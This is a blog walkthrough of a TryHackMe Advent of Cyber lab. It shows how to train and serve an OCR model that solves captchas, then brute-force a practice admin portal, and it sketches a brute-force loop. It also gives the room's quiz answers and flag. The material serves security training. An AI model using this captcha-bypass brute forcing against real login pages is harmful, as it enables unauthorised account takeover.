TryHackMe – Advent of Cyber – Day 16

The challenge for Advent of Cyber Day 16 is super cool – using machine learning to defeat a captcha!

If you’ve spent any time in offensive security, you know that a captcha on a login page usually makes brute forcing difficult, if not impossible. Sometimes it’s still worth entering credentials manually (for example, if a known user’s password has appeared in a data breach, you can try variants of the breached password). However, this often takes too much time, and there are usually better things to try.

But what if we could use machine learning to defeat the captcha and brute force rapidly? The great thing about this method is that although it takes a long time to train the model, once it’s in place it can be used as a fast and reliable brute force assistant. It defeats the captcha so that we can again brute force using a large list of credentials.

I really liked this topic because it shows how useful machine learning can be in offensive security. Methods like these will only become more powerful and popular, and it will be a while before many companies catch up.

Advent of Cyber 2023 can be found at: https://tryhackme.com/room/adventofcyber2023

Walkthrough for TryHackMe Advent of Cyber Day 16

About This Walkthrough/Disclaimer:

In this walkthrough I try to provide a unique perspective into the topics covered by the room. Sometimes I will also review a topic that isn’t covered in the TryHackMe room because I feel it may be a useful supplement.

I try to prevent spoilers by requiring a manual action (highlighting) to obtain all solutions. This way you can follow along without being handed the solution if you don’t want it. Always try to work as hard as you can through every problem and only use the solutions as a last resort.

Question 1

What key process of training a neural network is taken care of by using a CNN?

Answer (Highlight Below):

Feature extraction

Question 2

What is the name of the process used in the CNN to extract the features?

Answer (Highlight Below):

Convolution

Question 3

What is the name of the process used to reduce the features down?

Answer (Highlight Below):

Pooling
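
To make the last two answers more concrete, here is a minimal pure-Python sketch of what convolution and pooling do to an image. It is not the code used in the room; the tiny image, the kernel and the function names are all made up for illustration, and real CNN libraries learn their kernels during training rather than having them written by hand.

```python
# Illustrative only: a tiny pure-Python convolution and max-pooling pass.
# The image and kernel values are invented for this example.

def convolve2d(image, kernel):
    """Slide the kernel over the image (no padding, stride 1) and sum the products.

    As in most deep learning libraries, the kernel is not flipped.
    """
    kh, kw = len(kernel), len(kernel[0])
    out_h = len(image) - kh + 1
    out_w = len(image[0]) - kw + 1
    return [
        [
            sum(image[r + i][c + j] * kernel[i][j]
                for i in range(kh) for j in range(kw))
            for c in range(out_w)
        ]
        for r in range(out_h)
    ]

def max_pool2d(feature_map, size=2):
    """Keep only the largest value in each non-overlapping size x size window."""
    return [
        [
            max(feature_map[r + i][c + j]
                for i in range(size) for j in range(size))
            for c in range(0, len(feature_map[0]) - size + 1, size)
        ]
        for r in range(0, len(feature_map) - size + 1, size)
    ]

# 5x5 "image" with a vertical edge: dark (0) on the left, bright (1) on the right.
image = [
    [0, 0, 1, 1, 1],
    [0, 0, 1, 1, 1],
    [0, 0, 1, 1, 1],
    [0, 0, 1, 1, 1],
    [0, 0, 1, 1, 1],
]
# 2x2 kernel that responds to a left-to-right increase in brightness.
kernel = [
    [-1, 1],
    [-1, 1],
]

features = convolve2d(image, kernel)   # 4x4 feature map, strongest at the edge
pooled = max_pool2d(features, size=2)  # 2x2 summary of the feature map
print(features)
print(pooled)
```

The feature map lights up only in the column where the edge sits, and pooling shrinks that map while keeping the strongest response in each window.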

Question 4

What off-the-shelf CNN did we use to train a CAPTCHA-cracking OCR model?

Answer (Highlight Below):

Attention OCR

Question 5

What is the password that McGreedy set on the HQ Admin portal?

This is where the actual hands-on-keyboard challenge starts.

I started the AOCR docker container:

docker run -d -v /tmp/data:/tempdir/ aocr/full

Then I ran docker ps to get the container’s information:

docker ps

Next I connected to the container using the container id:

docker exec -it <CONTAINER_ID> /bin/bash

Running ‘curl http://hqadmin.thm:8000/’ in a new terminal window (it won’t work from inside the Docker container) shows the base64-encoded version of the captcha embedded in the page.
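
If you want to pull the captcha image out of that response yourself, something like the following sketch could work. It assumes the image is embedded as a data URI (for example data:image/png;base64,...), which I have not confirmed against the exact markup of the portal; the function name and the sample HTML are hypothetical.

```python
import base64
import re

# Assumption: the captcha is embedded as <img src="data:image/png;base64,...">.
DATA_URI_RE = re.compile(r'data:image/[a-zA-Z0-9.+-]+;base64,([A-Za-z0-9+/=]+)')

def extract_captcha_bytes(html):
    """Return the decoded bytes of the first base64 image in the page, or None."""
    match = DATA_URI_RE.search(html)
    if match is None:
        return None
    return base64.b64decode(match.group(1))

# Made-up page for demonstration; the payload is just the 8-byte PNG signature.
sample_payload = base64.b64encode(b"\x89PNG\r\n\x1a\n").decode("ascii")
sample_html = '<img src="data:image/png;base64,' + sample_payload + '">'

image_bytes = extract_captcha_bytes(sample_html)
print(image_bytes[:4])
```

In practice you would pass the HTML returned by the portal instead of sample_html and write the resulting bytes to a file to view the captcha.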

We can see the datasets in the labels directory:

Next I used aocr to train on the training.tfrecords dataset. This step isn’t necessary because the training has already been done, but I found it interesting to observe and learn about.

cd labels && aocr train training.tfrecords

Further down the output, we can see the training steps:

As discussed in TryHackMe’s description, ‘loss’ represents the prediction error; the lower the better, although overfitting to the training dataset is a real possibility. ‘Perplexity’ represents the uncertainty of the prediction; it starts above 1, and the goal is to get it as close to 1 as possible (again, with the same caveat about overfitting).
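
The relationship between the two numbers can be sketched in a few lines. This assumes the loss is an average cross-entropy and that perplexity is its exponential, which is the usual definition; I have not verified that the tool computes them in exactly this way, and the probabilities below are invented.

```python
import math

def cross_entropy(probs_for_correct_chars):
    """Average negative log-probability the model gave to the correct characters."""
    total = sum(math.log(p) for p in probs_for_correct_chars)
    return -total / len(probs_for_correct_chars)

def perplexity(loss):
    """Perplexity is the exponential of the cross-entropy loss."""
    return math.exp(loss)

# Invented probabilities assigned to the correct character at each position.
confident = [0.99, 0.98, 0.99]
unsure = [0.5, 0.25, 0.5]

for name, probs in (("confident", confident), ("unsure", unsure)):
    loss = cross_entropy(probs)
    print(name, round(loss, 4), round(perplexity(loss), 4))
```

A model that assigns probability 1 to every correct character has a loss of 0 and a perplexity of exactly 1, which is why 1 is the floor that training tries to approach.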

Now we can begin testing:

aocr test testing.tfrecords

At this point we have trained and tested our model, so we can export it by copying it to /tempdir/, which is mounted from /tmp/data on the host:

cd /ocr/ && cp -r model /tempdir/

Next I killed the Docker container using:

docker kill <CONTAINER_ID>

Then I started a serving container using the OCR model that I exported:

docker run -t --rm -p 8501:8501 -v /tmp/data/model/exported-model:/models/ -e MODEL_NAME=ocr tensorflow/serving
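
Once the serving container is up, the model can be queried over TensorFlow Serving’s REST API. The sketch below only builds the request body and does not send anything. It assumes the container is reachable on localhost:8501 with the model name ocr (both taken from the command above) and that the model’s input tensor is called "input", which is my assumption about the exported model rather than something shown in the room.

```python
import base64
import json

# Assumptions: the serving container from the command above is listening on
# localhost:8501, the model is named "ocr", and its input tensor is "input".
SERVING_URL = "http://localhost:8501/v1/models/ocr:predict"

def build_predict_request(image_bytes, input_name="input"):
    """Build the JSON body for a TensorFlow Serving REST predict call."""
    encoded = base64.b64encode(image_bytes).decode("ascii")
    body = {
        "signature_name": "serving_default",
        # Binary values are sent as {"b64": "<base64 string>"} objects.
        "inputs": {input_name: {"b64": encoded}},
    }
    return json.dumps(body)

# Placeholder bytes; a real call would use the captcha image instead.
payload = build_predict_request(b"fake image bytes")
print(SERVING_URL)
print(payload)
```

To actually get a prediction, POST the payload to SERVING_URL with a Content-Type of application/json; the field names in the response depend on how the model was exported.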

Then I ran the brute force script:

cd ~/Desktop/bruteforcer && python3 bruteforce.py

After a few seconds, the script identified valid credentials!
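
I did not write bruteforce.py, so the following is only my rough sketch of the kind of loop such a script needs, not its actual contents. The three callables, the status strings and the 0.9 confidence threshold are all hypothetical, and the demo runs against stub functions with no network traffic.

```python
def brute_force(username, passwords, fetch_captcha, solve_captcha, submit,
                min_confidence=0.9, max_captcha_retries=5):
    """Try each password; return the first one accepted, or None.

    All three callables are hypothetical stand-ins:
      fetch_captcha()            -> captcha image bytes
      solve_captcha(image_bytes) -> (predicted_text, confidence)
      submit(username, password, captcha_text) -> "ok", "bad_captcha" or "bad_login"
    """
    for password in passwords:
        for _ in range(max_captcha_retries):
            text, confidence = solve_captcha(fetch_captcha())
            if confidence < min_confidence:
                continue  # low-confidence prediction: request a fresh captcha
            result = submit(username, password, text)
            if result == "ok":
                return password
            if result == "bad_login":
                break  # captcha accepted but password wrong: try the next one
            # "bad_captcha": loop again with a new captcha for the same password
    return None

# Stub portal for demonstration only.
def fake_fetch():
    return b"image"

def fake_solve(image_bytes):
    return ("ABC12", 0.95)

def fake_submit(username, password, captcha_text):
    if captcha_text != "ABC12":
        return "bad_captcha"
    return "ok" if password == "winter" else "bad_login"

found = brute_force("admin", ["spring", "summer", "winter"],
                    fake_fetch, fake_solve, fake_submit)
print(found)
```

Skipping low-confidence predictions matters because a wrong captcha guess wastes a login attempt without telling us anything about the password.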

Answer (Highlight Below):

ReallyNotGonnaGuessThis

Question 6

What is the value of the flag that you receive when you successfully authenticate to the HQ Admin portal?

To get the flag, all we need to do is visit http://hqadmin.thm:8000/ and log in using the credentials that we just discovered.

Answer (Highlight Below):

THM{Captcha.Can't.Hold.Me.Back}